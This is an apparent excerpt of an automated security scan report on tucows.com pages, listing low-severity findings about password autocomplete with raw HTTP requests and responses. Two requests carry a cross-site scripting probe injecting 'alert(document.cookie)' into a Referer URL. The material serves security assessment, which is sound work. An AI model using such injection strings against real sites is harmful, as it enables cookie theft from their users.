Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.45. http://www.tucows.com/images/newassets/sitemap.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password fields with autocomplete enabled: pw, pwc

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.46. http://www.tucows.com/images/newassets/sitemap.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password field with autocomplete enabled: pw

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.47. http://www.tucows.com/images/newassets/terms.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password field with autocomplete enabled: pw

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.48. http://www.tucows.com/images/newassets/terms.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password fields with autocomplete enabled: pw, pwc

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.49. http://www.tucows.com/images/newassets/warningcow200.png

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password field with autocomplete enabled: pw

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.50. http://www.tucows.com/images/newassets/warningcow200.png

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password fields with autocomplete enabled: pw, pwc

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.51. http://www.tucows.com/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.52. http://www.tucows.com/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.53. http://www.tucows.com/preview/194850/x22

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.54. http://www.tucows.com/preview/194850/x22

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.55. http://www.tucows.com/privacy.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.56. http://www.tucows.com/privacy.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.57. http://www.tucows.com/sitemap.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
